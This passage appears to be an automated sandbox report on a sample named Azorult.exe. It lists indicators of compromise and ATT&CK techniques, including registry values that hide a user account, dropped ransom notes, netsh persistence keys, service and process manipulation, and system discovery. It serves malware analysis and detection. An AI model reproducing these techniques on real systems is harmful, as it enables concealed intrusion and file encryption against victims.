Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe

Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
discovery

Password Policy Discovery
T1201

AutoIT Executable 4 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0009000000023f12-2269.dat	autoit_exe
behavioral1/files/0x0007000000023fdd-3459.dat	autoit_exe
behavioral1/memory/7896-3572-0x00000000008B0000-0x000000000099C000-memory.dmp	autoit_exe
behavioral1/memory/7896-3632-0x00000000008B0000-0x000000000099C000-memory.dmp	autoit_exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\rutserv.pdb	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\exe\rutserv.pdb	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\symbols\exe\rutserv.pdb	rutserv.exe

Hide Artifacts: Hidden Users 1 TTPs 6 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	regedit.exe

UPX packed file 10 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0008000000023fcb-3441.dat	upx
behavioral1/memory/6124-3445-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/memory/8308-3446-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/files/0x0009000000023ff4-3565.dat	upx
behavioral1/memory/6124-3569-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/memory/8308-3571-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/memory/7896-3572-0x00000000008B0000-0x000000000099C000-memory.dmp	upx
behavioral1/memory/6124-3627-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/memory/8308-3629-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/memory/7896-3632-0x00000000008B0000-0x000000000099C000-memory.dmp	upx

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Win10\MicrosoftSolitaireSmallTile.scale-100.jpg	Azorult.exe
File created	C:\Program Files\Java\jdk-1.8\jre\lib\ext\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\client_eula.txt	Azorult.exe
File created	C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Abbreviations\en_US\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\bg2.jpg	Azorult.exe
File created	C:\Program Files\Java\jdk-1.8\lib\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mng.txt	Azorult.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Cloud Services.pdf	Azorult.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\javascript_poster.jpg	Azorult.exe
File opened for modification	C:\Program Files\ByteFence	Azorult.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\SupplementalDictionaries\en_CA\added.txt	Azorult.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\review_poster.jpg	Azorult.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Resources\RetailDemo\data\en-us\3.jpg	Azorult.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\music_offline_demo_page2.jpg	Azorult.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\ja-jp.xml	Azorult.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\resources.jar	Azorult.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\lib\dt.jar	Azorult.exe
File opened for modification	C:\Program Files\7-Zip\Lang\tt.txt	Azorult.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf	Azorult.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\SupplementalDictionaries\en_US\Excluded.txt	Azorult.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\bg1a.jpg	Azorult.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\ipsptb.xml	Azorult.exe
File opened for modification	C:\Program Files (x86)\SpyHunter	Azorult.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\ext\zipfs.jar	Azorult.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\ext\localedata.jar	Azorult.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sv.txt	Azorult.exe
File created	C:\Program Files\Microsoft Office\root\Office16\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt	Azorult.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\symbols.xml	Azorult.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mn.txt	Azorult.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\ipsita.xml	Azorult.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\hwrdeslm.dat	Azorult.exe
File opened for modification	C:\Program Files\7-Zip\Lang\co.txt	Azorult.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\40.jpg	Azorult.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\423x173\6.jpg	Azorult.exe
File opened for modification	C:\Program Files\SpyHunter	Azorult.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\THIRDPARTYLICENSEREADME.txt	Azorult.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\423x173\75.jpg	Azorult.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\423x173\32.jpg	Azorult.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_neutral_split.scale-200_8wekyb3d8bbwe\Win10\MicrosoftSolitaireWideTile.scale-200.jpg	Azorult.exe
File opened for modification	C:\Program Files\7-Zip\Lang\bn.txt	Azorult.exe
File created	C:\Program Files\Microsoft Office\root\Office16\Configuration\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\base.xml	Azorult.exe
File created	C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\SupplementalDictionaries\en_CA\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\edit_pdf_poster2x.jpg	Azorult.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\SkypeForBusinessBasic2019_eula.txt	Azorult.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\AdobeID.pdf	Azorult.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\music_offline_demo_page1.jpg	Azorult.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File opened for modification	C:\Program Files\7-Zip\Lang\zh-cn.txt	Azorult.exe
File created	C:\Program Files\7-Zip\YOUR_FILES_ARE_ENCRYPTED.HTML	Azorult.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Abbreviations\en_GB\List.txt	Azorult.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\15.jpg	Azorult.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\AboutAdsGenericBackgroundImage.jpg	Azorult.exe
File opened for modification	C:\Program Files\7-Zip\Lang\zh-tw.txt	Azorult.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ga.txt	Azorult.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_neutral_split.scale-125_8wekyb3d8bbwe\Win10\MicrosoftSolitaireSmallTile.scale-125.jpg	Azorult.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\keypad.xml	Azorult.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\ipssrl.xml	Azorult.exe
File opened for modification	C:\Program Files\7-Zip\Lang\th.txt	Azorult.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\ClientSub_M365_eula.txt	Azorult.exe

Launches sc.exe 48 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3860	sc.exe
2336	sc.exe
7656	sc.exe
6892	sc.exe
6376	sc.exe
5380	sc.exe
5924	sc.exe
4848	sc.exe
3612	sc.exe
5920	sc.exe
4412	sc.exe
7024	sc.exe
7056	sc.exe
2532	sc.exe
920	sc.exe
5360	sc.exe
5148	sc.exe
744	sc.exe
5212	sc.exe
1476	sc.exe
6516	sc.exe
6376	sc.exe
5092	sc.exe
7024	sc.exe
7064	sc.exe
6868	sc.exe
1168	sc.exe
8036	sc.exe
6344	sc.exe
6612	sc.exe
1588	sc.exe
6092	sc.exe
7116	sc.exe
7136	sc.exe
7936	sc.exe
6808	sc.exe
4488	sc.exe
2960	sc.exe
6612	sc.exe
744	sc.exe
1588	sc.exe
7648	sc.exe
2960	sc.exe
5688	sc.exe
6756	sc.exe
4488	sc.exe
2656	sc.exe
2568	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winlogon.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Azorult.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Azorult.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rutserv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	winit.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	winit.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	winit.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	winit.exe

Delays execution with timeout.exe 14 IoCs

evasion

pid	Process
7240	timeout.exe
7152	timeout.exe
3688	timeout.exe
8084	timeout.exe
7852	timeout.exe
7064	timeout.exe
11228	timeout.exe
8800	timeout.exe
6648	timeout.exe
7348	timeout.exe
8536	timeout.exe
7932	timeout.exe
6452	timeout.exe
2452	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
8272	ipconfig.exe

Kills process with taskkill 10 IoCs

evasion

pid	Process
7692	taskkill.exe
5252	taskkill.exe
10172	taskkill.exe
7404	taskkill.exe
3884	taskkill.exe
9624	taskkill.exe
10320	taskkill.exe
8820	taskkill.exe
10804	taskkill.exe
9740	taskkill.exe

Modifies registry class 10 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	wini.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset	winit.exe
